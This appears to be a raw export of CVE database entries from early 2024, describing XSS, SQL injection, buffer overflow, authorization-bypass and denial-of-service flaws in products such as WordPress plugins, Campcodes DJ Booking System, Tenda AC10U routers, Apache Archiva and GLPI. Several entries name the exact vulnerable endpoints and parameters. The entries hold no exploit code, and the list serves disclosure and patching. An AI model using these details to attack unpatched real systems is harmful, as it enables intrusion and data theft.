CVE 2024 27192 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Configure SMTP allows Reflected XSS.This issue affects Configure SMTP: from n/a through 3.1. MISC:https://patchstack.com/database/vulnerability/configure-smtp/wordpress-configure-smtp-plugin-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/configure-smtp/wordpress-configure-smtp-plugin-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 27190 Candidate Missing Authorization vulnerability in Jean-David Daviet Download Media.This issue affects Download Media: from n/a through 1.4.2. MISC:https://patchstack.com/database/vulnerability/download-media/wordpress-download-media-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/download-media/wordpress-download-media-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 2719 Candidate A vulnerability classified as problematic has been found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257472. MISC:VDB-257472 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257472 | MISC:VDB-257472 | Campcodes Complete Online DJ Booking System admin-profile.php cross site scripting | URL:https://vuldb.com/?id.257472 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%208.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%208.pdf Assigned (20240320)
CVE 2024 27189 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in catchsquare WP Social Widget allows Stored XSS.This issue affects WP Social Widget: from n/a through 2.2.5. MISC:https://patchstack.com/database/vulnerability/wp-social-widget/wordpress-wp-social-widget-plugin-2-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-social-widget/wordpress-wp-social-widget-plugin-2-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 2718 Candidate A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257471. MISC:VDB-257471 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257471 | MISC:VDB-257471 | Campcodes Complete Online DJ Booking System booking-bwdates-reports-details.php cross site scripting | URL:https://vuldb.com/?id.257471 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%207.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%207.pdf Assigned (20240320)
CVE 2024 2717 Candidate A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257470 is the identifier assigned to this vulnerability. MISC:VDB-257470 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257470 | MISC:VDB-257470 | Campcodes Complete Online DJ Booking System booking-search.php cross site scripting | URL:https://vuldb.com/?id.257470 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%206.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%206.pdf Assigned (20240320)
CVE 2024 2716 Candidate A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/contactus.php. The manipulation of the argument email leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257469 was assigned to this vulnerability. MISC:VDB-257469 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257469 | MISC:VDB-257469 | Campcodes Complete Online DJ Booking System contactus.php cross site scripting | URL:https://vuldb.com/?id.257469 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%205.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%205.pdf Assigned (20240320)
CVE 2024 2715 Candidate A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/user-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257468. MISC:VDB-257468 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257468 | MISC:VDB-257468 | Campcodes Complete Online DJ Booking System user-search.php cross site scripting | URL:https://vuldb.com/?id.257468 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%204.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%204.pdf Assigned (20240320)
CVE 2024 27140 Candidate ** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. MISC:https://lists.apache.org/thread/xrn6nt904ozh3jym60c3f5hj2fb75pjy | URL:https://lists.apache.org/thread/xrn6nt904ozh3jym60c3f5hj2fb75pjy Assigned (20240220)
CVE 2024 2714 Candidate A vulnerability has been found in Campcodes Complete Online DJ Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257467. MISC:VDB-257467 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257467 | MISC:VDB-257467 | Campcodes Complete Online DJ Booking System booking-bwdates-reports-details.php sql injection | URL:https://vuldb.com/?id.257467 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%203.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%203.pdf Assigned (20240320)
CVE 2024 27139 Candidate ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. MISC:https://lists.apache.org/thread/qr8b7r86p1hkn0dc0q827s981kf1bgd8 | URL:https://lists.apache.org/thread/qr8b7r86p1hkn0dc0q827s981kf1bgd8 Assigned (20240220)
CVE 2024 27138 Candidate ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva. Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer MISC:https://lists.apache.org/thread/070qcpclcb3sqk1hn8j5lvzohp30k1m2 | URL:https://lists.apache.org/thread/070qcpclcb3sqk1hn8j5lvzohp30k1m2 Assigned (20240220)
CVE 2024 27135 Candidate Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. MISC:https://lists.apache.org/thread/dh8nj2vmb2br6thjltq74lk9jxkz62wn | URL:https://lists.apache.org/thread/dh8nj2vmb2br6thjltq74lk9jxkz62wn | MISC:https://pulsar.apache.org/security/CVE-2024-27135/ | URL:https://pulsar.apache.org/security/CVE-2024-27135/ Assigned (20240220)
CVE 2024 27133 Candidate Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields. MISC:https://github.com/mlflow/mlflow/pull/10893 | URL:https://github.com/mlflow/mlflow/pull/10893 | MISC:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-dataset-xss-jfsa-2024-000631932/ | URL:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-dataset-xss-jfsa-2024-000631932/ Assigned (20240220)
CVE 2024 27132 Candidate Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue leads to a client-side RCE when running an untrusted recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over template variables. MISC:https://github.com/mlflow/mlflow/pull/10873 | URL:https://github.com/mlflow/mlflow/pull/10873 | MISC:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/ | URL:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/ Assigned (20240220)
CVE 2024 2713 Candidate A vulnerability, which was classified as critical, was found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257466 is the identifier assigned to this vulnerability. MISC:VDB-257466 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257466 | MISC:VDB-257466 | Campcodes Complete Online DJ Booking System booking-search.php sql injection | URL:https://vuldb.com/?id.257466 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%202.pdf Assigned (20240320)
CVE 2024 27121 Candidate Path traversal vulnerability exists in Machine Automation Controller NJ Series and Machine Automation Controller NX Series. An arbitrary file in the affected product may be accessed or arbitrary code may be executed by processing a specially crafted request sent from a remote attacker with an administrative privilege. As for the details of the affected product names/versions, see the information provided by the vendor under [References] section. MISC:https://jvn.jp/en/vu/JVNVU95852116/index.html | URL:https://jvn.jp/en/vu/JVNVU95852116/index.html | MISC:https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2024-001_en.pdf | URL:https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2024-001_en.pdf | MISC:https://www.fa.omron.co.jp/product/security/assets/pdf/ja/OMSR-2024-001_ja.pdf | URL:https://www.fa.omron.co.jp/product/security/assets/pdf/ja/OMSR-2024-001_ja.pdf Assigned (20240220)
CVE 2024 2712 Candidate A vulnerability, which was classified as critical, has been found in Campcodes Complete Online DJ Booking System 1.0. This issue affects some unknown processing of the file /admin/user-search.php. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257465 was assigned to this vulnerability. MISC:VDB-257465 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257465 | MISC:VDB-257465 | Campcodes Complete Online DJ Booking System user-search.php sql injection | URL:https://vuldb.com/?id.257465 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%201.pdf Assigned (20240320)
CVE 2024 2711 Candidate A vulnerability was found in Tenda AC10U 15.03.06.48. It has been rated as critical. Affected by this issue is the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceMac leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257462 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257462 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257462 | MISC:VDB-257462 | Tenda AC10U addWifiMacFilter stack-based overflow | URL:https://vuldb.com/?id.257462 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/addWifiMacFilter_deviceMac.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/addWifiMacFilter_deviceMac.md Assigned (20240320)
CVE 2024 27105 Candidate Frappe is a full-stack web application framework. Prior to versions 14.66.3 and 15.16.0, file permission can be bypassed using certain endpoints, granting less privileged users permission to delete or clone a file. Versions 14.66.3 and 15.16.0 contain a patch for this issue. No known workarounds are available. MISC:https://github.com/frappe/frappe/security/advisories/GHSA-hq5v-q29v-7rcw | URL:https://github.com/frappe/frappe/security/advisories/GHSA-hq5v-q29v-7rcw Assigned (20240219)
CVE 2024 27104 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. A user with rights to create and share dashboards can build a dashboard containing javascript code. Any user that will open this dashboard will be subject to an XSS attack. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/b409ca437864607b03c2014b9e3293b7f141af65 | URL:https://github.com/glpi-project/glpi/commit/b409ca437864607b03c2014b9e3293b7f141af65 | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-prc3-cx5m-h5mj | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-prc3-cx5m-h5mj Assigned (20240219)
CVE 2024 27103 Candidate Querybook is a Big Data Querying UI. When a user searches for their queries, datadocs, tables and lists, the search result is marked and highlighted, and this feature uses dangerouslySetInnerHTML which means that if the highlighted result has an XSS payload it will trigger. While the input to dangerouslySetInnerHTML is not sanitized for the data inside of queries which leads to an XSS vulnerability. During the "query auto-suggestion" the name of the suggested tables are set with innerHTML which leads to the XSS vulnerability. A patch to rectify this issue has been introduced in Querybook version 3.31.2. MISC:https://github.com/pinterest/querybook/commit/449bdc9e7d679e042c3718b7ed07d2ffa3c46a8f | URL:https://github.com/pinterest/querybook/commit/449bdc9e7d679e042c3718b7ed07d2ffa3c46a8f | MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-3hjm-9277-5c88 | URL:https://github.com/pinterest/querybook/security/advisories/GHSA-3hjm-9277-5c88 Assigned (20240219)
CVE 2024 27102 Candidate Wings is the server control plane for Pterodactyl Panel. This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can potentially be used to access files and directories on the host system. The full scope of impact is exactly unknown, but reading files outside of a server's base directory (sandbox root) is possible. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. Details on the exploitation of this vulnerability are embargoed until March 27th, 2024 at 18:00 UTC. In order to mitigate this vulnerability, a full rewrite of the entire server filesystem was necessary. Because of this, the size of the patch is massive, however effort was made to reduce the amount of breaking changes. Users are advised to update to version 1.11.9. There are no known workarounds for this vulnerability. MISC:https://github.com/pterodactyl/wings/commit/d1c0ca526007113a0f74f56eba99511b4e989287 | URL:https://github.com/pterodactyl/wings/commit/d1c0ca526007113a0f74f56eba99511b4e989287 | MISC:https://github.com/pterodactyl/wings/security/advisories/GHSA-494h-9924-xww9 | URL:https://github.com/pterodactyl/wings/security/advisories/GHSA-494h-9924-xww9 Assigned (20240219)
CVE 2024 27101 Candidate SpiceDB is an open source, Google Zanzibar-inspired database for creating and managing security-critical application permissions. Integer overflow in chunking helper causes dispatching to miss elements or panic. Any SpiceDB cluster with any schema where a resource being checked has more than 65535 relationships for the same resource and subject type is affected by this problem. The CheckPermission, BulkCheckPermission, and LookupSubjects API methods are affected. This vulnerability is fixed in 1.29.2. MISC:https://github.com/authzed/spicedb/commit/ef443c442b96909694390324a99849b0407007fe | URL:https://github.com/authzed/spicedb/commit/ef443c442b96909694390324a99849b0407007fe | MISC:https://github.com/authzed/spicedb/security/advisories/GHSA-h3m7-rqc4-7h9p | URL:https://github.com/authzed/spicedb/security/advisories/GHSA-h3m7-rqc4-7h9p Assigned (20240219)
CVE 2024 27100 Candidate Discourse is an open source platform for community discussion. In affected versions the endpoints for suspending users, silencing users and exporting CSV files weren't enforcing limits on the sizes of the parameters that they accept. This could lead to excessive resource consumption which could render an instance inoperable. A site could be disrupted by either a malicious moderator on the same site or a malicious staff member on another site in the same multisite cluster. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/discourse/discourse/commit/8cade1e825e90a66f440e820992d43c6905f4b47 | URL:https://github.com/discourse/discourse/commit/8cade1e825e90a66f440e820992d43c6905f4b47 | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-xq4v-qg27-gxgc | URL:https://github.com/discourse/discourse/security/advisories/GHSA-xq4v-qg27-gxgc Assigned (20240219)
CVE 2024 2710 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49. It has been declared as critical. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257461 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257461 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257461 | MISC:VDB-257461 | Tenda AC10U openSchedWifi setSchedWifi stack-based overflow | URL:https://vuldb.com/?id.257461 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/setSchedWifi_start.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/setSchedWifi_start.md Assigned (20240320)
CVE 2024 27099 Candidate The uAMQP is a C library for AMQP 1.0 communication to Azure Cloud Services. When processing an incorrect `AMQP_VALUE` failed state, may cause a double free problem. This may cause a RCE. Update submodule with commit 2ca42b6e4e098af2d17e487814a91d05f6ae4987. MISC:https://github.com/Azure/azure-uamqp-c/commit/2ca42b6e4e098af2d17e487814a91d05f6ae4987 | URL:https://github.com/Azure/azure-uamqp-c/commit/2ca42b6e4e098af2d17e487814a91d05f6ae4987 | MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-6rh4-fj44-v4jj | URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-6rh4-fj44-v4jj Assigned (20240219)
CVE 2024 27098 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can execute a SSRF based attack using Arbitrary Object Instantiation. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/3b6bc1b4aa1f3693b20ada3425d2de5108522484 | URL:https://github.com/glpi-project/glpi/commit/3b6bc1b4aa1f3693b20ada3425d2de5108522484 | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-92x4-q9w5-837w | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-92x4-q9w5-837w Assigned (20240219)
CVE 2024 27097 Candidate A user endpoint didn't perform filtering on an incoming parameter, which was added directly to the application log. This could lead to an attacker injecting false log entries or corrupt the log file format. This has been fixed in the CKAN versions 2.9.11 and 2.10.4. Users are advised to upgrade. Users unable to upgrade should override the `/user/reset` endpoint to filter the `id` parameter in order to exclude newlines. MISC:https://github.com/ckan/ckan/commit/81b56c55e5e3651d7fcf9642cd5a489a9b62212c | URL:https://github.com/ckan/ckan/commit/81b56c55e5e3651d7fcf9642cd5a489a9b62212c | MISC:https://github.com/ckan/ckan/security/advisories/GHSA-8g38-3m6v-232j | URL:https://github.com/ckan/ckan/security/advisories/GHSA-8g38-3m6v-232j Assigned (20240219)
CVE 2024 27096 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can exploit a SQL injection vulnerability in the search engine to extract data from the database. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/61a0c2302b4f633f5065358adc36058e1abc37f9 | URL:https://github.com/glpi-project/glpi/commit/61a0c2302b4f633f5065358adc36058e1abc37f9 | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-2x8m-vrcm-2jqv | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-2x8m-vrcm-2jqv Assigned (20240219)
CVE 2024 27094 Candidate OpenZeppelin Contracts is a library for secure smart contract development. The `Base64.encode` function encodes a `bytes` input by iterating over it in chunks of 3 bytes. When this input is not a multiple of 3, the last iteration may read parts of the memory that are beyond the input buffer. The vulnerability is fixed in 5.0.2 and 4.9.6. MISC:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/2d081f24cac1a867f6f73d512f2022e1fa987854 | URL:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/2d081f24cac1a867f6f73d512f2022e1fa987854 | MISC:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/723f8cab09cdae1aca9ec9cc1cfa040c2d4b06c1 | URL:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/723f8cab09cdae1aca9ec9cc1cfa040c2d4b06c1 | MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/92224533b1263772b0774eec3134e132a3d7b2a6 | URL:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/92224533b1263772b0774eec3134e132a3d7b2a6 | MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/a6286d0fded8771b3a645e5813e51993c490399c | URL:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/a6286d0fded8771b3a645e5813e51993c490399c | MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-9vx6-7xxf-x967 | URL:https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-9vx6-7xxf-x967 Assigned (20240219)
CVE 2024 27093 Candidate Minder is a Software Supply Chain Security Platform. In version 0.0.31 and earlier, it is possible for an attacker to register a repository with a invalid or differing upstream ID, which causes Minder to report the repository as registered, but not remediate any future changes which conflict with policy (because the webhooks for the repo do not match any known repository in the database). When attempting to register a repo with a different repo ID, the registered provider must have admin on the named repo, or a 404 error will result. Similarly, if the stored provider token does not have repo access, then the remediations will not apply successfully. Lastly, it appears that reconciliation actions do not execute against repos with this type of mismatch. This appears to primarily be a potential denial-of-service vulnerability. This vulnerability is patched in version 0.20240226.1425+ref.53868a8. MISC:https://github.com/stacklok/minder/commit/53868a878e93f29c43437f96dbc990b548e48d1d | URL:https://github.com/stacklok/minder/commit/53868a878e93f29c43437f96dbc990b548e48d1d | MISC:https://github.com/stacklok/minder/security/advisories/GHSA-q6h8-4j2v-pjg4 | URL:https://github.com/stacklok/minder/security/advisories/GHSA-q6h8-4j2v-pjg4 Assigned (20240219)
CVE 2024 27092 Candidate Hoppscotch is an API development ecosystem. Due to lack of validation for fields like Label (Edit Team) - TeamName, bad actors can send emails with Spoofed Content as Hoppscotch. Part of payload (external link) is presented in clickable form - easier to achieve own goals by malicious actors. This issue is fixed in 2023.12.6. MISC:https://github.com/hoppscotch/hoppscotch/blob/main/packages/hoppscotch-backend/src/team-invitation/team-invitation.service.ts#L153 | URL:https://github.com/hoppscotch/hoppscotch/blob/main/packages/hoppscotch-backend/src/team-invitation/team-invitation.service.ts#L153 | MISC:https://github.com/hoppscotch/hoppscotch/commit/6827e97ec583b2534cdc1c2f33fa44973a0c2bf5 | URL:https://github.com/hoppscotch/hoppscotch/commit/6827e97ec583b2534cdc1c2f33fa44973a0c2bf5 | MISC:https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-8r6h-8r68-q3pp | URL:https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-8r6h-8r68-q3pp Assigned (20240219)
CVE 2024 2709 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49. It has been classified as critical. Affected is the function fromSetRouteStatic of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257460. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257460 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257460 | MISC:VDB-257460 | Tenda AC10U SetStaticRouteCfg fromSetRouteStatic stack-based overflow | URL:https://vuldb.com/?id.257460 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/fromSetRouteStatic.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/fromSetRouteStatic.md Assigned (20240320)
CVE 2024 27089 Candidate ** REJECT ** This candidate was withdrawn by its CNA. Further investigation showed that it was not in the allowed scope of that CNA's CVE ID assignments. Assigned (20240219)
CVE 2024 27088 Candidate es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63. MISC:https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2 | URL:https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2 | MISC:https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602 | URL:https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602 | MISC:https://github.com/medikoo/es5-ext/issues/201 | URL:https://github.com/medikoo/es5-ext/issues/201 | MISC:https://github.com/medikoo/es5-ext/security/advisories/GHSA-4gmj-3p3h-gm8h | URL:https://github.com/medikoo/es5-ext/security/advisories/GHSA-4gmj-3p3h-gm8h Assigned (20240219)
CVE 2024 27087 Candidate Kirby is a content management system. The new link field introduced in Kirby 4 allows several different link types that each validate the entered link to the relevant URL format. It also includes a "Custom" link type for advanced use cases that don't fit any of the pre-defined link formats. As the "Custom" link type is meant to be flexible, it also allows the javascript: URL scheme. In some use cases this can be intended, but it can also be misused by attackers to execute arbitrary JavaScript code when a user or visitor clicks on a link that is generated from the contents of the link field. This vulnerability is patched in 4.1.1. MISC:https://github.com/getkirby/kirby/commit/cda3dd9a15228d35e62ff86cfa87a67e7c687437 | URL:https://github.com/getkirby/kirby/commit/cda3dd9a15228d35e62ff86cfa87a67e7c687437 | MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-63h4-w25c-3qv4 | URL:https://github.com/getkirby/kirby/security/advisories/GHSA-63h4-w25c-3qv4 Assigned (20240219)
CVE 2024 27085 Candidate Discourse is an open source platform for community discussion. In affected versions users that are allowed to invite others can inject arbitrarily large data in parameters used in the invite route. The problem has been patched in the latest version of Discourse. Users are advised to upgrade. Users unable to upgrade should disable invites or restrict access to them using the `invite allowed groups` site setting. MISC:https://github.com/discourse/discourse/commit/62ea382247c1f87361d186392c45ca74c83be295 | URL:https://github.com/discourse/discourse/commit/62ea382247c1f87361d186392c45ca74c83be295 | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-cvp5-h7p8-mjj6 | URL:https://github.com/discourse/discourse/security/advisories/GHSA-cvp5-h7p8-mjj6 Assigned (20240219)
CVE 2024 27084 Candidate ** REJECT ** This CVE is a duplicate of CVE-2024-1631. Assigned (20240219)
